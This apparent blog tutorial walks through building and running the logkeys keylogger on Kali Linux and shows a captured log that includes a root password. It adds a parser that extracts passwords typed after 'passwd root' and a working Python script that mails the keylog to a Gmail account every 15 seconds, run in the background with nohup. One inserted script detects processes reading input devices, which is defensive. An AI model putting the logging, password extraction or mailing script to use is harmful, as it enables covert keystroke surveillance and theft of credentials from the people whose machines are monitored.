logkeys is a keylogger for Linux. Its source code is hosted on Google Code; the project page is https://code.google.com/p/logkeys/ (Google Code has since shut down and the project later moved to GitHub as kernc/logkeys).
The test environment is Kali Linux.
First, download logkeys.
Extract it:
root@kali:~# tar -zxvf logkeys*
root@kali:~# cd logkeys*
Take a look at the INSTALL file:
root@kali:~/Desktop/logkeys-0.1.1a# cat INSTALL
===============================================================================
logkeys keylogger - instalation instructions
===============================================================================

Provided your GNU/Linux distribution doesn't include logkeys package in its
repositories, manual installation of logkeys from source is as easy as :

$ tar xvzf logkeys-0.1.0.tar.gz   # to extract the logkeys archive
$ cd logkeys-0.1.0/build          # move to build directory to build there
$ ../configure                    # invoke configure from parent directory
$ make                            # make compiles what it needs to compile

( become superuser now )          # you need root to install in system dir
# make install                    # installs binaries, manuals and scripts

That's it.

To ever uninstall logkeys, remove accompanying scripts and manuals, issue

# make uninstall                  # in the same logkeys-0.1.0/build dir from before

See README file for usage instructions and notes.
root@kali:~/Desktop/logkeys-0.1.1a#
The INSTALL file is clear enough; next comes the build.
root@kali:~/logkeys-0.1.1a# cd build
root@kali:~/logkeys-0.1.1a/build# ls
root@kali:~/logkeys-0.1.1a/build#
# the classic three-step Linux build: configure, make, make install
root@kali:~/Desktop/logkeys-0.1.1a/build# ../configure
root@kali:~/Desktop/logkeys-0.1.1a/build# make
root@kali:~/Desktop/logkeys-0.1.1a/build# make install
root@kali:~/Desktop/logkeys-0.1.1a/build# ls
config.h  config.log  config.status  Makefile  man  scripts  src  stamp-h1
root@kali:~/Desktop/logkeys-0.1.1a/build# cd src
root@kali:~/Desktop/logkeys-0.1.1a/build/src# ls
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile
logkeys is the compiled binary. Note that make install has already copied it into the install prefix (/usr/local/bin by default for an autotools build), so the extra cp to /bin below is not actually needed.
root@kali:~/Desktop/logkeys-0.1.1a/build/src# cp logkeys /bin
root@kali:~/Desktop/logkeys-0.1.1a/build/src# ls
llk  llkk  llkk.o  llk.o  logkeys  logkeys.o  Makefile
root@kali:~/Desktop/logkeys-0.1.1a/build/src# logjeys -h
bash: logjeys: command not found
root@kali:~/Desktop/logkeys-0.1.1a/build/src# logkeys -h
logkeys: invalid option -- 'h'
Usage: logkeys [OPTION]...
Log depressed keyboard keys.

  -s, --start               start logging keypresses
  -m, --keymap=FILE         use keymap FILE
  -o, --output=FILE         log output to FILE [/var/log/logkeys.log]
  -u, --us-keymap           use en_US keymap instead of configured default
  -k, --kill                kill running logkeys process
  -d, --device=FILE         input event device [eventX from /dev/input/]
  -?, --help                print this help screen
      --export-keymap=FILE  export configured keymap to FILE and exit
      --no-func-keys        log only character keys
      --no-timestamps       don't prepend timestamps to log file lines
      --post-http=URL       POST log to URL as multipart/form-data file
      --post-size=SIZE      post log file when size equals SIZE [500k]

Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log
          logkeys -s -d event6
          logkeys -k

logkeys version: 0.1.1a
logkeys homepage: <http://code.google.com/p/logkeys/>
root@kali:~/Desktop/logkeys-0.1.1a/build/src#
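The -d option above shows where logkeys gets its data: it reads raw key events straight from an /dev/input/eventX device. That is also the defender's handle on it, because any process holding such a device open is visible through /proc/<pid>/fd. The following check is an added example written for this page; it is not part of logkeys or of the original post. It assumes a Linux procfs layout (/proc/<pid>/fd symlinks and /proc/<pid>/comm) and builds a small constructed /proc look-alike so it can be exercised offline; the pids, process names and paths in that tree are made up.

```python
#!/usr/bin/env python3
"""List processes holding /dev/input/event* devices open.

Added example; not part of the original post or of logkeys. logkeys reads raw
key events from /dev/input/eventX (see the -d option), so every process with
such a descriptor deserves a look. The display server (Xorg, or a Wayland
compositor via libinput) legitimately holds these devices too, so a hit is a
lead, not a verdict. Reading other users' /proc/<pid>/fd requires root.
"""
import os
import re
import tempfile

INPUT_DEVICE = re.compile(r"^/dev/input/event\d+$")


def find_input_readers(proc_root="/proc"):
    """Return [(pid, comm, [devices])] for every process that has an
    /dev/input/eventN descriptor, sorted by pid. proc_root is a parameter so
    the same scan can be run against a constructed tree (see below)."""
    hits = []
    pids = sorted(int(e) for e in os.listdir(proc_root) if e.isdigit())
    for pid in pids:
        base = os.path.join(proc_root, str(pid))
        devices = set()
        try:
            for fd in os.listdir(os.path.join(base, "fd")):
                try:
                    target = os.readlink(os.path.join(base, "fd", fd))
                except OSError:
                    continue      # fd closed between listdir and readlink
                if INPUT_DEVICE.match(target):
                    devices.add(target)
        except OSError:
            continue              # process exited, or we are not root
        if devices:
            try:
                with open(os.path.join(base, "comm")) as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            hits.append((pid, comm, sorted(devices)))
    return hits


def build_fake_proc(root):
    """Construct a minimal /proc look-alike (made-up data) for offline use:
    pid 7499 is a pretend keylogger with event3 open twice plus its log file,
    pid 7500 a display server (a legitimate reader), pid 1 holds only a pipe."""
    def add(pid, comm, fds):
        os.makedirs(os.path.join(root, pid, "fd"))
        with open(os.path.join(root, pid, "comm"), "w") as f:
            f.write(comm + "\n")
        for num, target in fds.items():
            os.symlink(target, os.path.join(root, pid, "fd", num))
    add("1", "systemd", {"0": "pipe:[1234]"})
    add("7499", "logkeys", {"3": "/dev/input/event3", "5": "/dev/input/event3",
                            "6": "/root/.logkeys"})
    add("7500", "Xorg", {"4": "/dev/input/event0", "8": "/dev/input/mice"})
    return root


def scan_constructed_tree():
    """Build the constructed tree in a temporary directory, scan it, and
    return the hits; used to exercise the scanner without root."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_input_readers(build_fake_proc(tmp))


if __name__ == "__main__":
    # Real scan of this host; run as root to see every process.
    for pid, comm, devs in find_input_readers():
        print("%6d  %-15s %s" % (pid, comm, " ".join(devs)))
```

Because /proc/<pid>/fd of other users' processes is only readable by root, run the scan as root; on a desktop expect the display server to appear alongside anything unexpected, and compare the unexpected entry's executable path and parent against what you know should be running.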
Of logkeys' options, the most troublesome is -m, the keyboard layout (keymap) option.
With the default keymap, I got the following result:
root@kali:~# logkeys -k
root@kali:~# logkeys -s -o /root/.logkeys
root@kali:~# ls
Desktop  Downloads  Python
root@kali:~# cat .logkeys

Logging started ...

2013-11-13 08:36:57+0800 > ka
2013-11-13 08:37:02+0800 > x܂t ,kofjeya
root@kali:~#
The key positions are clearly shifted: logkeys translates the raw scancodes it reads through a keymap, and when the default keymap does not match the actual layout, every key is logged as some other character. The -u option forces the standard US (en_US) keymap instead:
root@kali:~# logkeys -s -u -o .test.txt
root@kali:~# ls
Desktop  Downloads  Python
root@kali:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~# cat .test.txt

Logging started ...

2013-11-13 08:42:52+0800 > ls
2013-11-13 08:42:54+0800 > cat .test.txt
2013-11-13 08:42:59+0800 > clear
2013-11-13 08:43:09+0800 > ls
2013-11-13 08:43:10+0800 > passwd root
2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck
2013-11-13 08:43:29+0800 > f4ck
2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt
root@kali:~#
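The log above is a raw keystroke stream, not what ended up on the screen: the password typed at the passwd prompt appears together with the characters that were deleted and the <BckSp> tokens that deleted them. To read such a log, the backspaces have to be applied. The following post-processing script is an added example written for this page; it is not part of logkeys or of the original post. It assumes the line format shown in the transcript (YYYY-MM-DD HH:MM:SS+ZZZZ > keys), interprets only the <BckSp> token, leaves any other <...> token in place, and embeds the lines from the session above as a constructed sample.

```python
#!/usr/bin/env python3
"""Reconstruct what was actually typed from a logkeys log.

Added example; not code from the original post or from logkeys. Assumes the
log format shown above, "YYYY-MM-DD HH:MM:SS+ZZZZ > keystrokes", where deleted
characters appear literally followed by a <BckSp> token. Only <BckSp> is
interpreted; other <...> tokens are kept as opaque units.
"""
import re

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) > (.*)$")
TOKEN_RE = re.compile(r"<[A-Za-z]+>|.")   # one <Token> or one character

# Constructed sample: the lines captured in the session above.
SAMPLE_LOG = """\
Logging started ...

2013-11-13 08:43:10+0800 > passwd root
2013-11-13 08:43:16+0800 > fuck<BckSp><BckSp><BckSp><BckSp><BckSp>f4ck
2013-11-13 08:43:29+0800 > f4ck
2013-11-13 08:43:31+0800 > cat .text<BckSp><BckSp>st.txt
"""


def resolve_backspaces(keys):
    """Apply <BckSp> tokens: each one removes the previous surviving unit
    (a backspace on an empty buffer is a no-op, as it is in a terminal)."""
    buf = []
    for tok in TOKEN_RE.findall(keys):
        if tok == "<BckSp>":
            if buf:
                buf.pop()
        else:
            buf.append(tok)
    return "".join(buf)


def parse_log(text):
    """Return [(timestamp, raw_keys, reconstructed)] for each timestamped
    line; header lines such as "Logging started ..." are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, raw = m.groups()
        entries.append((ts, raw, resolve_backspaces(raw)))
    return entries


def capture_following(entries, command, count=2):
    """Return the `count` reconstructed lines typed right after `command`;
    after "passwd root" these are the new password and its confirmation."""
    recon = [e[2] for e in entries]
    for i, text in enumerate(recon):
        if text == command:
            return recon[i + 1:i + 1 + count]
    return []


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ts, raw, fixed in entries:
        print("%s  %-50s -> %s" % (ts, raw, fixed))
    print("typed after 'passwd root':", capture_following(entries, "passwd root"))
```

logkeys starts a fresh timestamped line on Enter, which is why each command lands on its own line and why the two lines after "passwd root" are exactly the password and its repeat; the same property makes a simple "lines after a prompt-triggering command" search useful for triage.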
Done. Stopping here would be boring, though; what follows is the real point.
#!/usr/bin/env python
# coding=utf-8
import optparse
import sched
import smtplib
import time
from email.message import Message

LOG_FILE = "/root/.logkeys"   # logkeys output file; change it to match the -o option you used
INTERVAL = 15                 # seconds between mails; set this to suit your needs

scheduler = sched.scheduler(time.time, time.sleep)


def sendMail(theEmail, thePasswd):
    systemTime = time.strftime('%Y-%m-%d-%T', time.localtime(time.time()))
    try:
        with open(LOG_FILE, "r") as fileObj:
            content = fileObj.read()
    except IOError as err:
        print("Cannot read file: %s" % err)
        raise SystemExit(1)

    message = Message()
    message['Subject'] = 'Log Keys'    # mail subject
    message['From'] = theEmail
    message['To'] = theEmail
    message.set_payload("Current time " + systemTime + "\n" + content)   # mail body
    msg = message.as_string()

    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
    # smtp.set_debuglevel(1)           # uncomment to trace the SMTP dialogue
    smtp.starttls()                    # upgrade to TLS before sending credentials
    smtp.login(theEmail, thePasswd)
    # sendmail() blocks until the server has accepted the message, so no sleep
    # is needed before quit(); without this call nothing is ever sent.
    smtp.sendmail(theEmail, [theEmail], msg)
    smtp.quit()


def perform(inc, theEmail, thePasswd):
    # re-arm the timer first so a slow SMTP exchange does not drift the schedule
    scheduler.enter(inc, 0, perform, (inc, theEmail, thePasswd))
    sendMail(theEmail, thePasswd)


def myMain(inc, theEmail, thePasswd):
    scheduler.enter(0, 0, perform, (inc, theEmail, thePasswd))
    scheduler.run()


if __name__ == "__main__":
    optObj = optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args) = optObj.parse_args()
    if not options.user or not options.passwd:
        optObj.error("both -u and -p are required")
    myMain(INTERVAL, options.user, options.passwd)
This script reads logkeys' output file at a fixed interval and mails it to a Gmail mailbox (the whole file each time, so the mails grow with the log). Two practical caveats: Gmail no longer accepts the account password itself for SMTP logins, so an app password (which requires 2-step verification on the account) or OAuth is needed; and passing the password with -p leaves it visible in the process list and the shell history. Using the script is simple:
root@kali:~/Python# python mail.py -h
Usage: mail.py [options]

Options:
  -h, --help  show this help message and exit
  -u USER     Gmail account
  -p PASSWD   Gmail Passwd
root@kali:~/Python# ls
file.txt  mail.py  nohup.out
root@kali:~/Python# nohup ./mail.py -u [email protected] -p passwd &
[1] 7499
root@kali:~/Python# nohup: ignoring input and appending output to "nohup.out"